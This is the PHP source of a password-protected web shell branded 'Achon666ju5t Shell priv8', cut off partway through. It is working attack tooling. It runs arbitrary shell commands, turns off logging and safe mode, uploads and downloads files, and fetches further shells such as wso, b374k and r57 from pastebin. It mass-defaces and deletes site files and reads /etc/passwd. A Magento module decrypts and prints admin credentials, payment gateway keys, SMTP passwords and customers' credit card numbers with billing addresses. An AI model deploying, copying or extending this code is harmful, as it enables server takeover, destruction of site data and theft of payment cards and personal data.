<?php@session_start(); @error_reporting(0); @error_log(0);@ini_set('erro

1. <?php
2. @session_start();
3. @error_reporting(0);
4. @error_log(0);
5. @ini_set('error_log',NULL);
6. @ini_set('log_errors',0);
7. @ini_set('max_execution_time',0);
8. @ini_set('output_buffering',0);
9. @ini_set('display_errors', 0);
10. @set_time_limit(0);
11. @set_magic_quotes_runtime(0);
12. function printLogin() {
13. ?>
14. <html>
15. <head>
16. <title>AchonXjusT</title>
17. <link href='https://lh4.googleusercontent.com/-vRbahBaV4GA/VGiPnhH1PqI/AAAAAAAAABw/pYik-TNuvFU/w810-h587-no/diev4owl.jpg' rel='icon' type='image/x-icon'/>
18. <meta name='author' content='Achon666ju5t'>
19. <meta charset="UTF-8">
20. <style type='text/css'>
21. @import url(https://fonts.googleapis.com/css?family=Abel);
22. html {
23. background: #000000;
24. color: #ffffff;
25. font-family: 'Abel';
26. font-size: 13px;
27. width: 100%;
28. }
29. input[type=text], input[type=password],input[type=submit] {
30. background: transparent;
31. color: #ffffff;
32. border: 1px solid #ffffff;
33. margin: 5px auto;
34. padding-left: 5px;
35. font-family: 'Abel';
36. font-size: 13px;
37. }
38. </style>
39. </head>
40. <style>
41. input { margin:0;background-color:#fff;border:1px solid #fff; }
42. </style>
43. <center><img src="https://lh4.googleusercontent.com/-vRbahBaV4GA/VGiPnhH1PqI/AAAAAAAAABw/pYik-TNuvFU/w810-h587-no/diev4owl.jpg"</img>
44. <br><font size="5"> Achon666ju5t Shell priv8<br>Extreme Crew - BlackHat Hackers<br> Masukin Passwordnya Goblok !!!<br></font><form method=post>
45. <input type=password name=janchonx>
46. </form></center>
47. <?php
48.  
49. exit;
50. }
51. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
52. if( empty( $lol ) ||
53. ( isset( $_POST['janchonx'] ) && ( md5($_POST['janchonx']) == $lol ) ) )
54. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
55. else
56. printLogin();
57. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
58. @ob_clean();
59. $file = $_GET['file'];
60. header('Content-Description: File Transfer');
61. header('Content-Type: application/octet-stream');
62. header('Content-Disposition: attachment; filename="'.basename($file).'"');
63. header('Expires: 0');
64. header('Cache-Control: must-revalidate');
65. header('Pragma: public');
66. header('Content-Length: ' . filesize($file));
67. readfile($file);
68. exit;
69. }
70.  
71. ?>
72. <html>
73. <head>
74. <title>AchonXjusT</title>
75. <link href='https://lh4.googleusercontent.com/-vRbahBaV4GA/VGiPnhH1PqI/AAAAAAAAABw/pYik-TNuvFU/w810-h587-no/diev4owl.jpg' rel='icon' type='image/x-icon'/>
76. <meta name='author' content='Achon666ju5t'>
77. <meta charset="UTF-8">
78. <style type='text/css'>
79. @import url(https://fonts.googleapis.com/css?family=Abel);
80. html {
81. background: #000000;
82. color: #ffffff;
83. font-family: 'Abel';
84. font-size: 13px;
85. width: 100%;
86. }
87. li {
88. display: inline;
89. margin: 5px;
90. padding: 5px;
91. }
92. table, th, td {
93. border-collapse:collapse;
94. font-family: Tahoma, Geneva, sans-serif;
95. background: transparent;
96. font-family: 'Abel';
97. font-size: 13px;
98. }
99. .table_home, .th_home, .td_home {
100. border: 1px solid #ffffff;
101. }
102. th {
103. padding: 10px;
104. }
105. a {
106. color: #ffffff;
107. text-decoration: none;
108. }
109. a:hover {
110. color: gold;
111. text-decoration: underline;
112. }
113. b {
114. color: gold;
115. }
116. input[type=text], input[type=password],input[type=submit] {
117. background: transparent;
118. color: #ffffff;
119. border: 1px solid #ffffff;
120. margin: 5px auto;
121. padding-left: 5px;
122. font-family: 'Abel';
123. font-size: 13px;
124. }
125. textarea {
126. border: 1px solid #ffffff;
127. width: 100%;
128. height: 400px;
129. padding-left: 5px;
130. margin: 10px auto;
131. resize: none;
132. background: transparent;
133. color: #ffffff;
134. font-family: 'Abel';
135. font-size: 13px;
136. }
137. select {
138. background: transparent;
139. color: #ffffff;
140. border: 1px solid #ffffff;
141. margin: 5px auto;
142. padding-left: 5px;
143. font-family: 'Abel';
144. font-size: 13px;
145. }
146. .but {
147. background: transparent;
148. color: #ffffff;
149. border: 1px solid #ffffff;
150. margin: 5px auto;
151. padding-left: 5px;
152. font-family: 'Abel';
153. font-size: 13px;
154. }
155. </style>
156. </head>
157. <?php
158. if (file_exists("php.ini")){
159. }else{
160. $img = fopen('php.ini', 'w');
161. $sec = "safe_mode = OFF
162. disable_funtions = NONE";
163. fwrite($img ,$sec);
164. fclose($img);}
165. function w($dir,$perm) {
166. if(!is_writable($dir)) {
167. return "<font color=red>".$perm."</font>";
168. } else {
169. return "<font color=lime>".$perm."</font>";
170. }
171. }
172. function UrlLoop($url,$type){
173.  
174. $urlArray = array();
175.  
176. $ch = curl_init();
177. curl_setopt($ch, CURLOPT_URL, $url);
178. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
179. $result = curl_exec($ch);
180.  
181. $regex='|<a.*?href="(.*?)"|';
182. preg_match_all($regex,$result,$parts);
183. $links=$parts[1];
184. foreach($links as $link){
185. array_push($urlArray, $link);
186. }
187. curl_close($ch);
188.  
189. foreach($urlArray as $value){
190. $lol="$url$value";
191. if(preg_match("#$type#is", $lol)) {
192. echo "$lol\r\n";
193. }
194. }
195. }
196. function exe($cmd) {
197. if(function_exists('system')) {
198. @ob_start();
199. @system($cmd);
200. $buff = @ob_get_contents();
201. @ob_end_clean();
202. return $buff;
203. } elseif(function_exists('exec')) {
204. @exec($cmd,$results);
205. $buff = "";
206. foreach($results as $result) {
207. $buff .= $result;
208. } return $buff;
209. } elseif(function_exists('passthru')) {
210. @ob_start();
211. @passthru($cmd);
212. $buff = @ob_get_contents();
213. @ob_end_clean();
214. return $buff;
215. } elseif(function_exists('shell_exec')) {
216. $buff = @shell_exec($cmd);
217. return $buff;
218. }
219. }
220. function perms($file){
221. $perms = fileperms($file);
222. if (($perms & 0xC000) == 0xC000) {
223. $info = 's';
224. } elseif (($perms & 0xA000) == 0xA000) {
225. $info = 'l';
226. } elseif (($perms & 0x8000) == 0x8000) {
227. $info = '-';
228. } elseif (($perms & 0x6000) == 0x6000) {
229. $info = 'b';
230. } elseif (($perms & 0x4000) == 0x4000) {
231. $info = 'd';
232. } elseif (($perms & 0x2000) == 0x2000) {
233. $info = 'c';
234. } elseif (($perms & 0x1000) == 0x1000) {
235. $info = 'p';
236. } else {
237. $info = 'u';
238. }
239. $info .= (($perms & 0x0100) ? 'r' : '-');
240. $info .= (($perms & 0x0080) ? 'w' : '-');
241. $info .= (($perms & 0x0040) ?
242. (($perms & 0x0800) ? 's' : 'x' ) :
243. (($perms & 0x0800) ? 'S' : '-'));
244. $info .= (($perms & 0x0020) ? 'r' : '-');
245. $info .= (($perms & 0x0010) ? 'w' : '-');
246. $info .= (($perms & 0x0008) ?
247. (($perms & 0x0400) ? 's' : 'x' ) :
248. (($perms & 0x0400) ? 'S' : '-'));
249. $info .= (($perms & 0x0004) ? 'r' : '-');
250. $info .= (($perms & 0x0002) ? 'w' : '-');
251. $info .= (($perms & 0x0001) ?
252. (($perms & 0x0200) ? 't' : 'x' ) :
253. (($perms & 0x0200) ? 'T' : '-'));
254. return $info;
255. }
256. function hdd($s) {
257. if($s >= 1073741824)
258. return sprintf('%1.2f',$s / 1073741824 ).' GB';
259. elseif($s >= 1048576)
260. return sprintf('%1.2f',$s / 1048576 ) .' MB';
261. elseif($s >= 1024)
262. return sprintf('%1.2f',$s / 1024 ) .' KB';
263. else
264. return $s .' B';
265. }
266. function ambilKata($param, $kata1, $kata2){
267. if(strpos($param, $kata1) === FALSE) return FALSE;
268. if(strpos($param, $kata2) === FALSE) return FALSE;
269. $start = strpos($param, $kata1) + strlen($kata1);
270. $end = strpos($param, $kata2, $start);
271. $return = substr($param, $start, $end - $start);
272. return $return;
273. }
274. if(get_magic_quotes_gpc()) {
275. function idx_ss($array) {
276. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
277. }
278. $_POST = idx_ss($_POST);
279. }
280. function CreateTools($names,$lokasi){
281. if ( $_GET['create'] == $names ){
282. $a= "".$_SERVER['SERVER_NAME']."";
283. $b= dirname($_SERVER['PHP_SELF']);
284. $c = "/chonx_tools/".$names.".php";
285. if (file_exists('chonx_tools/'.$names.'.php')){
286. echo '<script type="text/javascript">alert("Done");window.location.href = "chonx_tools/'.$names.'.php";</script> ';
287. }
288. else {mkdir("chonx_tools", 0777);
289. file_put_contents('chonx_tools/'.$names.'.php', file_get_contents($lokasi));
290. echo ' <script type="text/javascript">alert("Done");window.location.href = "chonx_tools/'.$names.'.php";</script> ';}}}
291.  
292. CreateTools("wso","http://pastebin.com/raw/3eh3Gej2");
293. CreateTools("adminer"."https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
294. CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV");
295. CreateTools("injection","http://pastebin.com/raw/nxxL8c1f");
296. CreateTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq");
297. CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
298. CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
299. CreateTools("tokopedia","http://pastebin.com/dvhzWgby");
300. CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
301. CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj");
302. CreateTools("r57","http://pastebin.com/raw/G2VEDunW");
303. CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
304. CreateTools("extractor","http://pastebin.com/raw/jQnMFHBL");
305. CreateTools("bh","http://pastebin.com/raw/3L2ESWeu");
306. CreateTools("dhanus","http://pastebin.com/raw/v4xGus6X");
307. if(isset($_GET['dir'])) {
308. $dir = $_GET['dir'];
309. chdir($_GET['dir']);
310. } else {
311. $dir = getcwd();
312. }
313. $dir = str_replace("\\","/",$dir);
314. $scdir = explode("/", $dir);
315. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
316. $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
317. $ds = @ini_get("disable_functions");
318. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
319. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
320. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
321. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
322. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
323. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
324. if(!function_exists('posix_getegid')) {
325. $user = @get_current_user();
326. $uid = @getmyuid();
327. $gid = @getmygid();
328. $group = "?";
329. } else {
330. $uid = @posix_getpwuid(posix_geteuid());
331. $gid = @posix_getgrgid(posix_getegid());
332. $user = $uid['name'];
333. $uid = $uid['uid'];
334. $group = $gid['name'];
335. $gid = $gid['gid'];
336. }
337. $d0mains = @file("/etc/named.conf");
338. $users=@file('/etc/passwd');
339. if($d0mains)
340. {
341. $count;
342. foreach($d0mains as $d0main)
343. {
344. if(@ereg("zone",$d0main))
345. {
346. preg_match_all('#zone "(.*)"#', $d0main, $domains);
347. flush();
348. if(strlen(trim($domains[1][0])) > 2)
349. {
350. flush();
351. $count++;
352. }
353. }
354. }
355. }
356.  
357. $sport=$_SERVER['SERVER_PORT'];
358. echo "<table style='width:100%'>";
359. echo "<tr><td>System: <font color=lime>".php_uname()."</font></td></tr>";
360. echo "<tr><td>User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")</td></tr>";
361. echo "<tr><td>Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font></td></tr>";
362. echo "<tr><td>HDD: <font color=lime>".hdd(disk_free_space("/"))."</font> / <font color=lime>".hdd(disk_total_space("/"))."</font></td></tr>";
363. echo "<tr><td>Websites :<font color=lime> $count </font> Domains</td></tr>";
364. echo "<tr><td>Port :<font color=lime> $sport</font> </td></tr>";
365. echo "<tr><td>Safe Mode: $sm</td></tr>";
366. echo "<tr><td>Disable Functions: $show_ds</td></tr>";
367.  
368. echo "<tr><td>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>";
369. echo "<tr><td>Current DIR: ";
370. foreach($scdir as $c_dir => $cdir) {
371. echo "<a href='?dir=";
372. for($i = 0; $i <= $c_dir; $i++) {
373. echo $scdir[$i];
374. if($i != $c_dir) {
375. echo "/";
376. }
377. }
378. echo "'>$cdir</a>/";
379. }
380. echo "<tr><td><form method='post' action='?dir=$dir&do=cmd'>
381. Command :
382. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
383. </form></td></tr>";
384. echo "</table><hr>";
385. echo "<center>";
386. echo "<ul>";
387. echo "<li>[ <a href='?'>Home</a> ]</li>";
388. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
389. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
390. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
391. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
392. echo "<li>[ <a href='?dir=$dir&do=symconfig'>Config 2</a> ]</li>";
393. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
394. echo "<li>[ <a href='?dir=$dir&do=symlink'>Symlink</a> ]<br></li>";
395. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
396. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
397. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
398. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
399. echo "<li>[ <a href='?dir=$dir&do=defacerid'>Defacer.ID</a> ]</li>";
400. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li><br>";
401. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
402. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
403. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
404. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
405. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
406. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
407. echo "<li>[ <a href='?dir=$dir&do=auto_cu_wp'>WordPress Auto Edit User V.2</a> ]</li>";
408. echo "<li>[ <a href='?dir=$dir&do=auto_cu_joomla'>Joomla Auto Edit User V.2</a> ]</li>";
409. echo "<li>[ <a href='?dir=$dir&do=passwbypass'>Bypass etc/passw</a> ]<br></li>";
410. echo "<li>[ <a href='?dir=$dir&do=loghunter'>Log Hunter</a> ]</li>";
411. echo "<li>[ <a href='?dir=$dir&do=shellchk'>Shell Checker</a> ]</li>";
412. echo "<li>[ <a href='?dir=$dir&do=shelscan'>Shell Finder</a> ]</li>";
413. echo "<li>[ <a href='?dir=$dir&do=zip'>Zip Menu</a> ]</li>";
414. echo "<li>[ <a href='?dir=$dir&do=injectcode'>Code Inject</a> ]</li>";
415. echo "<li>[ <a href='?dir=$dir&do=about'>About</a> ]</li>";
416. echo "<li>[ <a href='?dir=$dir&do=magen'>Magento DB Info</a> ]</li><br>";
417. echo "<li>[ <a href='?dir=$dir&do=metu'>LogOut</a> ]<br></li>";
418. echo "</ul>";
419. echo "</center>";
420. echo "<hr>";
421. if($_GET['do'] == 'upload') {
422. echo "<center>";
423. if($_POST['upload']) {
424. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
425. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
426. } else {
427. $act = "<font color=red>failed to upload file</font>";
428. }
429. }
430. echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
431. echo $act;
432. echo "</center>";
433. }
434. elseif($_GET['do'] == 'cmd') {
435. if($_POST['do_cmd']) {
436. echo "<pre>".exe($_POST['cmd'])."</pre>";
437. }
438. } elseif($_GET['do'] == 'mass_deface') {
439. echo "<center><form action=\"\" method=\"post\">\n";
440. $dirr=$_POST['d_dir'];
441. $index = $_POST["script"];
442. $index = str_replace('"',"'",$index);
443. $index = stripslashes($index);
444. function edit_file($file,$index){
445. if (is_writable($file)) {
446. clear_fill($file,$index);
447. echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
448. }
449. else {
450. echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
451. }
452. }
453. function hapus_massal($dir,$namafile) {
454. if(is_writable($dir)) {
455. $dira = scandir($dir);
456. foreach($dira as $dirb) {
457. $dirc = "$dir/$dirb";
458. $lokasi = $dirc.'/'.$namafile;
459. if($dirb === '.') {
460. if(file_exists("$dir/$namafile")) {
461. unlink("$dir/$namafile");
462. }
463. } elseif($dirb === '..') {
464. if(file_exists("".dirname($dir)."/$namafile")) {
465. unlink("".dirname($dir)."/$namafile");
466. }
467. } else {
468. if(is_dir($dirc)) {
469. if(is_writable($dirc)) {
470. if(file_exists($lokasi)) {
471. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
472. unlink($lokasi);
473. $idx = hapus_massal($dirc,$namafile);
474. }
475. }
476. }
477. }
478. }
479. }
480. }
481. function clear_fill($file,$index){
482. if(file_exists($file)){
483. $handle = fopen($file,'w');
484. fwrite($handle,'');
485. fwrite($handle,$index);
486. fclose($handle); } }
487.  
488. function gass(){
489. global $dirr , $index ;
490. chdir($dirr);
491. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
492. $files = scandir($dirr) ;
493. $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
494. sort($files);
495. $n = 0 ;
496. foreach ($files as $file){
497. if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
498. echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
499. edit_file($file,$index);
500. flush();
501. $n = $n +1 ;
502. }
503. }
504. echo "<br>";
505. echo "<center><br><h3>$n Kali Anda Telah Ngecrot Disini </h3></center><br>";
506. }
507. function ListFiles($dirrall) {
508.  
509. if($dh = opendir($dirrall)) {
510.  
511. $files = Array();
512. $inner_files = Array();
513. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
514. $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
515. while($file = readdir($dh)) {
516. if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
517. if(is_dir($dirrall . "/" . $file)) {
518. $inner_files = ListFiles($dirrall . "/" . $file);
519. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
520. } else {
521. array_push($files, $dirrall . "/" . $file);
522. }
523. }
524. }
525.  
526. closedir($dh);
527. return $files;
528. }
529. }
530. function gass_all(){
531. global $index ;
532. $dirrall=$_POST['d_dir'];
533. foreach (ListFiles($dirrall) as $key=>$file){
534. $file = str_replace('//',"/",$file);
535. echo "<center><strong>$file</strong> ===>";
536. edit_file($file,$index);
537. flush();
538. }
539. $key = $key+1;
540. echo "<center><br><h3>$key Kali Anda Telah Ngecrot Disini </h3></center><br>"; }
541. function sabun_massal($dir,$namafile,$isi_script) {
542. if(is_writable($dir)) {
543. $dira = scandir($dir);
544. foreach($dira as $dirb) {
545. $dirc = "$dir/$dirb";
546. $lokasi = $dirc.'/'.$namafile;
547. if($dirb === '.') {
548. file_put_contents($lokasi, $isi_script);
549. } elseif($dirb === '..') {
550. file_put_contents($lokasi, $isi_script);
551. } else {
552. if(is_dir($dirc)) {
553. if(is_writable($dirc)) {
554. echo "[<font color=lime>DONE</font>] $lokasi<br>";
555. file_put_contents($lokasi, $isi_script);
556. $idx = sabun_massal($dirc,$namafile,$isi_script);
557. }
558. }
559. }
560. }
561. }
562. }
563. if($_POST['mass'] == 'onedir') {
564. echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
565. $ini="http://";
566. $mainpath=$_POST[d_dir];
567. $file=$_POST[d_file];
568. $dir=opendir("$mainpath");
569. $code=base64_encode($_POST[script]);
570. $indx=base64_decode($code);
571. while($row=readdir($dir)){
572. $start=@fopen("$row/$file","w+");
573. $finish=@fwrite($start,$indx);
574. if ($finish){
575. echo"$ini$row/$file\n";
576. }
577. }
578. echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
579. $mainpath=$_POST[d_dir];$file=$_POST[d_file];
580. $dir=opendir("$mainpath");
581. $code=base64_encode($_POST[script]);
582. $indx=base64_decode($code);
583. while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
584. $finish=@fwrite($start,$indx);
585. if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
586. }
587.  
588. }
589. elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
590. elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
591. elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
592. elseif($_POST['mass'] == 'massdeface') {
593. echo "<div style='margin: 5px auto; padding: 5px'>";
594. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
595. echo "</div>"; }
596. else {
597. echo "
598. <center><font style='text-decoration: underline;'>
599. Select Type:<br>
600. </font>
601. <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
602. <option value=\"onedir\">Mass Deface 1 Dir</option>
603. <option value=\"massdeface\">Mass Deface ALL Dir</option>
604. <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
605. <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
606. <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
607. <font style='text-decoration: underline;'>Folder:</font><br>
608. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
609. <font style='text-decoration: underline;'>Filename:</font><br>
610. <input type='text' name='d_file' value='0x.php' style='width: 450px;' height='10'><br>
611. <font style='text-decoration: underline;'>Index File:</font><br>
612. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Achon666ju5t</textarea><br>
613. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
614. </form></center>";
615. }
616. }
617. elseif($_GET['do'] == 'magen') {
618. echo'
619. <div id="page-wrap">
620. <center>
621. <br>
622. <FORM action="" method="post">
623. <div align="center">[M A G E N T O] - Stealing Information<br>
624. <div align="center">coder: sohai & n4KuLa_<br>
625. <input type="hidden" name="form_action" value="2">
626. </div>
627. </div>
628. ';
629.  
630.  
631. if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){
632. $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');
633. if(isset($xml->global->resources->default_setup->connection)) {
634. $connection = $xml->global->resources->default_setup->connection;
635. $prefix = $xml->global->resources->db->table_prefix;
636. $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1
637. require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';
638.  
639. try {
640. $app = Mage::app('default');
641. Mage::getSingleton('core/session', array('name'=>'frontend'));
642. }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}
643.  
644. if (!mysql_connect($connection->host, $connection->username, $connection->password)){
645. print("Could not connect: " . mysql_error());
646. }
647. mysql_select_db($connection->dbname);
648. echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n";
649.  
650. $crypto = new Varien_Crypt_Mcrypt();
651. $crypto->init($key);
652.  
653. //=========================================================================================================
654. $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");
655. if (!$query){
656. echo "<center><b>Gagal</b></center>";
657. }else{
658. $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));
659. echo'<br><br>
660. ====================================================================<br>
661. [ Admin FROM website : '.$site['website'].'] <br>
662. ====================================================================<br>';
663. }
664. echo "
665. <table border='1' align='center' >
666. <tr>
667. <td>id</td>
668. <td>firstname</td>
669. <td>lastname</td>
670. <td>email</td>
671. <td>username</td>
672. <td>password</td>
673. </tr>";
674. while($vx = mysql_fetch_array($query)) {
675. $no = 1;
676. $user_id = $vx['user_id'];
677. $username = $vx['username'];
678. $password = $vx['password'];
679. $email = $vx['email'];
680. $firstname = $vx['firstname'];
681. $lastname = $vx['lastname'];
682. echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";
683. }
684. echo "</table><br>";
685. //=========================================================================================================
686. $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");
687. if(mysql_num_rows($query) != 0){
688. if (!$query){
689. echo "<center><b>Gagal</b></center>";
690. }else{
691. echo'<br><br>
692. ====================================================================<br>
693. [ Authorizenet ] <br>
694. ====================================================================<br>';
695. }
696. echo "
697. <table border='1' align='center' >
698. <tr>
699. <td>no</td>
700. <td>user</td>
701. <td>pass</td>
702. </tr>";
703. $no = 1;
704. while($vx = mysql_fetch_array($query)) {
705. $user = $crypto->decrypt($vx['user']);
706. $pass = $crypto->decrypt($vx['pass']);
707.  
708.  
709. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
710. $no++;
711. }
712. echo "</table><br>";
713. }
714. //=========================================================================================================
715. $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");
716. if(mysql_num_rows($query_smtp) != 0){
717. if (!$query_smtp){
718. echo "<center><b>Gagal</b></center>";
719. }else{
720. echo'<br><br>
721. ====================================================================<br>
722. [ SMTP ] <br>
723. ====================================================================<br>';
724. }
725. echo "
726. <table border='1' align='center' >
727. <tr>
728. <td>no</td>
729. <td>host</td>
730. <td>port</td>
731. <td>user</td>
732. <td>pass</td>
733. </tr>";
734. $no = 1;
735. $batas = 0;
736. while($rows = mysql_fetch_array($query_smtp)) {
737. $smtphost = $rows[0];
738. $smtpport = $rows[1];
739. $smtpuser = $rows[2];
740. $smtppass = $rows[3];
741. echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";
742. $no++;
743. }
744. echo "</table><br>";
745. }
746. //=========================================================================================================
747. $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");
748. $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
749. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){
750. echo'<br><br>
751. ====================================================================<br>
752. [ Credit Card ] <br>
753. ====================================================================<br>';
754. echo "
755. <table border='1' align='left' >
756. <tr>
757. <td>no</td>
758. <td>Date</td>
759. <td>Credit Owner</td>
760. <td>method</td>
761. <td>Credit Number</td>
762. <td>Credit Exp</td>
763. <td>CVV</td>
764. <td>Address</td>
765. </tr>";
766. $no = 1;
767. $batas = 0;
768. while($vx = mysql_fetch_array($query)){
769. $date = $vx['updated_at'];
770. $cc_owner = $vx['cc_owner'];
771. $method = $vx['method'];
772. $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);
773. $exp = $vx['exp'];
